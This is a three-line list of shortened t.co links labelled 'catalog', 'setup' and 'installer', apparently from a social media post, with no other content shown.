catalog — https://t.co/OG4yKQHy9H
setup — https://t.co/aq0PFucEal
installer — https://t.co/K7IsnKx3jD